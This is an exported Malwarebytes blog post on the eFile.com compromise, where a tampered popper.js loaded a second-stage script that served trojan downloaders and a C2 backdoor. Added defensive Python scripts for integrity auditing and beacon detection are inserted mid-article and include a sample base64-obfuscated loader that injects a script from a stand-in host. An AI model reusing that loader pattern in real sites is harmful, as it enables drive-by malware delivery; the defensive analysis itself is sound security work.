{"id":21689,"date":"2023-04-06T16:11:55","date_gmt":"2023-04-07T00:11:55","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/04\/06\/news-15420\/"},"modified":"2023-04-06T16:11:55","modified_gmt":"2023-04-07T00:11:55","slug":"news-15420","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/04\/06\/news-15420\/","title":{"rendered":"Visitors of tax return e-file service may have downloaded malware"},"content":{"rendered":"<p>The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers, and&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware\/\" target=\"_blank\">corroborated<\/a>&nbsp;by BleepingComputer. Note that this incident concerns only eFile.com, not the&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/IRS_e-file\" target=\"_blank\">IRS&#8217; e-file infrastructure<\/a>&nbsp;or other similar-sounding domains.<\/p>\n<p>As of this writing, eFile.com is clean. Users can access it without worry.<\/p>\n<h2>The attack began 18 days ago<\/h2>\n<p>The first sign of trouble was a report that something might be wrong with the website. 
A Reddit user&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.reddit.com\/r\/Scams\/comments\/11tx8pj\/possible_fake_website_network_error\/\" target=\"_blank\">encountered<\/a>&nbsp;a fake &#8220;Network Error&#8221; page when accessing&nbsp;<a href=\"https:\/\/www.efile.com\/\">www.efile.com<\/a>. The page, as shown below, informed visitors that their browser &#8220;uses an unsupported protocol&#8221; and that they needed to click the link it provided to update their browser, a well-known lure used by scammers.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/easset_upload_file230_262787_e.png\" alt=\"\" width=\"833\" height=\"543\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: center;\">This fake error message used to come up when visiting the domain. Uncharacteristically, it told visitors to update their browsers, which made Redditors suspect the domain had been hijacked. 
(Source:&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.reddit.com\/user\/SaltyPotter\/\" target=\"_blank\">\/u\/SaltyPotter<\/a>, original image cropped to fit)<\/p>\n<p>This, however, was not a scam page on a look-alike domain: the real eFile.com site was serving it.<\/p>\n<p>Known figures in cybersecurity, such as MalwareHunterTeam (<a target=\"_blank\" href=\"https:\/\/twitter.com\/malwrhunterteam\" rel=\"noreferrer noopener\">@malwarehunterteam<\/a>) and Johannes Ullrich (<a target=\"_blank\" href=\"https:\/\/twitter.com\/johullrich\" rel=\"noreferrer noopener\">@johullrich<\/a>) of SANS, caught wind of the potential site compromise and dug in, each publishing their own analysis.<\/p>\n<p>According to both&nbsp;<a target=\"_blank\" href=\"https:\/\/twitter.com\/malwrhunterteam\/status\/1642988428080865281\" rel=\"noreferrer noopener\">MalwareHunterTeam<\/a>&nbsp;and&nbsp;<a target=\"_blank\" href=\"https:\/\/isc.sans.edu\/diary\/Supply+Chain+Compromise+or+False+Positive+The+Intriguing+Case+of+efilecom+updated+confirmed+malicious+code\/29708\" rel=\"noreferrer noopener\">Ullrich<\/a>, a tampered JS file named&nbsp;<em>popper.js<\/em>&nbsp;contains obfuscated malicious code, so its purpose is not apparent on a plain reading. That code loads another script,&nbsp;<em>update.js<\/em>, hosted on an Amazon Web Services (AWS) site;&nbsp;<em>update.js<\/em>&nbsp;contains the code that displays the fake error page.<\/p>\n<p><em>popper.js<\/em>&nbsp;is a legitimate library file that was altered to perform malicious tasks. Because almost every page on the eFile website loads it, the malicious code runs whenever a visitor opens any page on the site.<\/p>\n<p><em>update.js<\/em>&nbsp;also contains two hard-coded download URLs, both served from the malicious domain&nbsp;<em>infoamanewonliag[.]online<\/em>. The two payloads target the two browsers most visitors use, Chrome and Firefox.<\/p>\n<p>&#8220;So different browsers get different payloads,&#8221; says Ullrich. 
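<\/p>\n<p>The chain described above (a trusted library altered to decode and run a hidden loader, which in turn pulls a second-stage script from another host) is exactly what a site owner&#8217;s own integrity check should catch. The following Python script is an added example and is not code from this article, from eFile.com or from the researchers cited: it pins the legitimate library&#8217;s Subresource Integrity (SRI) hash, decodes any atob(...) literals found in the served copy and flags script URLs whose origin is outside an allow-list. The sample scripts, the bucket hostname and the allowed origins are all constructed for this illustration and are not the real indicators from the incident.<\/p>\n
```python
"""
Integrity audit for a site's served JavaScript, modelled on the eFile.com
incident: a legitimate popper.js was altered to carry hidden code that loads
a second-stage script (update.js) from an external host.

Added example, not code from the article or from eFile.com. The sample
scripts, hostnames and allowed origins below are constructed for illustration.
"""
import base64
import hashlib
import re
from urllib.parse import urlparse

# Constructed stand-in for the legitimate library as shipped by the site.
CLEAN_POPPER_JS = (
    "/* popper.js v1 (stand-in) */\n"
    "function createPopper(ref, pop){return {ref:ref,pop:pop};}\n"
)

# Constructed stand-in for an injected loader; the hostname is hypothetical.
_INJECTED_LOADER = (
    'var s=document.createElement("script");'
    's.src="https://example-bucket.s3.amazonaws.com/update.js";'
    'document.head.appendChild(s);'
)
# The tampered copy hides the loader inside eval(atob("...")), as obfuscated
# loaders commonly do, so no URL is visible in the file itself.
TAMPERED_POPPER_JS = CLEAN_POPPER_JS + 'eval(atob("%s"));\n' % (
    base64.b64encode(_INJECTED_LOADER.encode()).decode()
)

# Origins this site legitimately loads script from (assumption for the example).
ALLOWED_ORIGINS = {"https://www.example-site.test", "https://cdn.example-site.test"}

_B64_RE = re.compile(r'''atob\(\s*["']([A-Za-z0-9+/=]{16,})["']\s*\)''')
_URL_RE = re.compile(r'''https?://[^\s"'<>()]+''')


def sri_hash(content: str, algo: str = "sha384") -> str:
    """Return the Subresource Integrity value ('sha384-<base64>') of a script body.
    A browser given <script integrity="..."> refuses to run a file whose hash differs."""
    digest = hashlib.new(algo, content.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def decode_base64_blobs(js: str) -> list:
    """Decode every atob("...") literal; obfuscated loaders hide their URLs this way."""
    decoded = []
    for blob in _B64_RE.findall(js):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64; skip rather than crash the audit
    return decoded


def extract_script_urls(js: str) -> set:
    """Collect absolute URLs in the script and in anything it would decode at runtime."""
    text = js + "\n" + "\n".join(decode_base64_blobs(js))
    return set(_URL_RE.findall(text))


def audit_script(js: str, pinned_sri: str, allowed_origins: set = ALLOWED_ORIGINS) -> dict:
    """Compare a served script against its pinned hash and flag off-origin loaders."""
    def origin(url: str) -> str:
        p = urlparse(url)
        return f"{p.scheme}://{p.netloc}"

    foreign = sorted(u for u in extract_script_urls(js) if origin(u) not in allowed_origins)
    return {
        "hash_matches": sri_hash(js) == pinned_sri,
        "uses_eval_atob": bool(re.search(r"eval\(\s*atob\(", js)),
        "foreign_script_urls": foreign,
    }


if __name__ == "__main__":
    pinned = sri_hash(CLEAN_POPPER_JS)  # recorded at deploy time, stored off the web host
    print("clean:   ", audit_script(CLEAN_POPPER_JS, pinned))
    print("tampered:", audit_script(TAMPERED_POPPER_JS, pinned))
```
\n<p>The same sha384 value is what goes into the <em>integrity<\/em> attribute of the page&#8217;s script tag, where the browser itself refuses a modified file. An attacker who can rewrite the library on the server can usually rewrite the HTML to drop that attribute too, which is why the pinned hash is compared from outside the web host as well.<\/p>\n<p>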
Chrome users get a payload named &#8220;update.exe&#8221; with a valid signature from Sichuan Niurui Science and Technology. Firefox users get &#8220;installer.exe.&#8221; There is no indication whether other browsers built on Chromium (the project Chrome is based on) or on Gecko (Firefox&#8217;s engine) would also receive the payloads.<\/p>\n<p>BleepingComputer&nbsp;<a target=\"_blank\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware\/\" rel=\"noreferrer noopener\">has independently confirmed<\/a>&nbsp;that the payloads connect to an IP address hosted by Alibaba in China. The same IP also hosts the malicious domain the payloads were downloaded from.<\/p>\n<p>These executables were written in Python. Malwarebytes detects them as&nbsp;<strong>Trojan.Downloader.Python<\/strong>.<\/p>\n<p>As of Wednesday,&nbsp;<em>popper.js<\/em>&nbsp;is free of malicious code.<\/p>\n<h2>The backdoor<\/h2>\n<p>Once a user runs the payload, a PHP script runs quietly in the background. BleepingComputer&#8217;s analysis shows that every 10 seconds the backdoor script connects to a remote&nbsp;<a target=\"_blank\" href=\"https:\/\/www.malwarebytes.com\/glossary\/cc\" rel=\"noreferrer noopener\">command and control (C2)<\/a>&nbsp;server to receive one or more tasks to perform on the affected system. These include &#8220;executing a command and sending its output back to the attackers or downloading additional files onto the computer.&#8221;<\/p>\n<p>The backdoor is unsophisticated, but it is enough to give the attackers access to the entire system, which on a work machine means company-owned devices too.<\/p>\n<p>&#8220;The full scope of this incident, including if the attack successfully infected any eFile.com visitors and customers, remains yet to be learned,&#8221; says BleepingComputer.<\/p>\n<hr \/>\n<p dir=\"ltr\">
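<\/p>\n<p>A backdoor that checks in with its C2 every 10 seconds, as described in the backdoor section above, leaves a very regular pattern in outbound proxy or firewall logs, and that regularity is the usual hunting signal. The following Python script is an added example, not code from this article, from BleepingComputer or from the malware: it groups outbound connections by source and destination, measures the spread of the gaps between them and reports pairs whose interval is nearly constant. The log lines, hostnames and IP addresses are constructed for the illustration; the real C2 address is not used, and the log format is a made-up space-separated one rather than any particular product&#8217;s.<\/p>\n
```python
"""
Fixed-interval beacon detection over outbound connection logs, for backdoors
that poll their C2 on a timer (the eFile.com payload checked in every 10 s).

Added example; not code from the article, BleepingComputer or the malware.
The log lines, hosts and IPs are constructed; the real C2 address is not used.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log: "<ISO timestamp> <src_host> <dst_ip>:<port> <bytes_sent>".
# wks-17 beacons to 198.51.100.23:80 roughly every 10 s with tiny requests,
# and separately browses 203.0.113.7:443 at irregular intervals (benign noise).
SAMPLE_LOG = """\
2023-04-03T09:00:00 wks-17 198.51.100.23:80 412
2023-04-03T09:00:03 wks-17 203.0.113.7:443 2104
2023-04-03T09:00:10 wks-17 198.51.100.23:80 415
2023-04-03T09:00:20 wks-17 198.51.100.23:80 409
2023-04-03T09:00:29 wks-17 198.51.100.23:80 411
2023-04-03T09:00:40 wks-17 198.51.100.23:80 413
2023-04-03T09:00:41 wks-17 203.0.113.7:443 88231
2023-04-03T09:00:50 wks-17 198.51.100.23:80 417
2023-04-03T09:01:00 wks-17 198.51.100.23:80 410
2023-04-03T09:01:57 wks-17 203.0.113.7:443 1500
2023-04-03T09:03:12 wks-17 203.0.113.7:443 300
"""


def parse_log(text: str) -> list:
    """Parse the constructed format into (timestamp, src, dst, bytes) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, nbytes = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(nbytes)))
    return events


def find_beacons(events: list, min_hits: int = 5, max_jitter: float = 0.25) -> list:
    """Return (src, dst) pairs whose inter-connection gaps are nearly constant.

    max_jitter is the allowed coefficient of variation (stdev / mean) of the gaps;
    a strict timer gives a value near 0, human browsing gives a value well above it.
    Real implants often add random sleep to defeat this, so keep the threshold tunable.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, nbytes in events:
        by_pair[(src, dst)].append((ts, nbytes))

    findings = []
    for (src, dst), hits in by_pair.items():
        if len(hits) < min_hits:
            continue  # too few samples to judge periodicity
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        mean_gap = statistics.fmean(gaps)
        if mean_gap <= 0:
            continue  # duplicate timestamps; not a timer
        jitter = statistics.pstdev(gaps) / mean_gap
        if jitter <= max_jitter:
            findings.append({
                "src": src,
                "dst": dst,
                "hits": len(hits),
                "period_s": round(statistics.median(gaps), 1),
                "jitter": round(jitter, 3),
                "bytes_median": statistics.median(n for _, n in hits),
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```
\n<p>On the constructed log the detector reports only the 10-second pair; the browsing to the other host is dropped by the jitter threshold even when the minimum hit count is lowered. The small, near-identical request sizes in the flagged pair are a second signal worth keeping in the report, since a task-polling loop that usually receives no work sends almost the same bytes on every check-in.<\/p>\n<p dir=\"ltr\">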
Want to learn more about how we can help protect your business? Get a free trial below.<\/p>\n<p style=\"text-align: center;\"><span class=\"blue-cta-bttn\" style=\"background-color: #0d3ecc; line-height: 50px; padding: 0 20px;\"><a href=\"https:\/\/www.malwarebytes.com\/business\/contact-us\/\">TRY NOW<\/a><\/span><\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/visitors-of-tax-return-e-file-service-may-have-downloaded-malware\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<table cellpadding=\"10\">\n<tr>\n<td valign=\"top\" align=\"left\">\n<p>Categories: <a href=\"https:\/\/www.malwarebytes.com\/blog\/category\/news\" rel=\"category tag\">News<\/a><\/p>\n<p>Categories: <a href=\"https:\/\/www.malwarebytes.com\/blog\/category\/scams\" rel=\"category tag\">Scams<\/a><\/p>\n<p>Tags: tax scams<\/p>\n<p>Tags:  efile.com<\/p>\n<p>Tags:  US tax 2023<\/p>\n<p>Tags:  backdoor<\/p>\n<p>Tags:  Trojan<\/p>\n<p>Tags:  Johannes Ullrich<\/p>\n<p>Tags:  MalwareHunterTeam<\/p>\n<p>Tags:  \/u\/SaltyPotter<\/p>\n<p>Tags:  fake network error notification<\/p>\n<p>Cybercriminals have compromised eFile.com to host malicious code that allows for the download of Trojans.<\/p>\n<table width=\"100%\">\n<tr>\n<td align=\"right\">\n<p><b>(<a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/visitors-of-tax-return-e-file-service-may-have-downloaded-malware\" title=\"Visitors of tax return e-file service may have downloaded malware\">Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/04\/visitors-of-tax-return-e-file-service-may-have-downloaded-malware\">Visitors of tax return e-file service may have downloaded malware<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\">Malwarebytes 
Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[29056,10836,29053,29057,26013,29055,32,10574,24380,10833,29054],"class_list":["post-21689","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-u-saltypotter","tag-backdoor","tag-efile-com","tag-fake-network-error-notification","tag-johannes-ullrich","tag-malwarehunterteam","tag-news","tag-scams","tag-tax-scams","tag-trojan","tag-us-tax-2023"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21689","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=21689"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21689\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=21689"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=21689"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=21689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}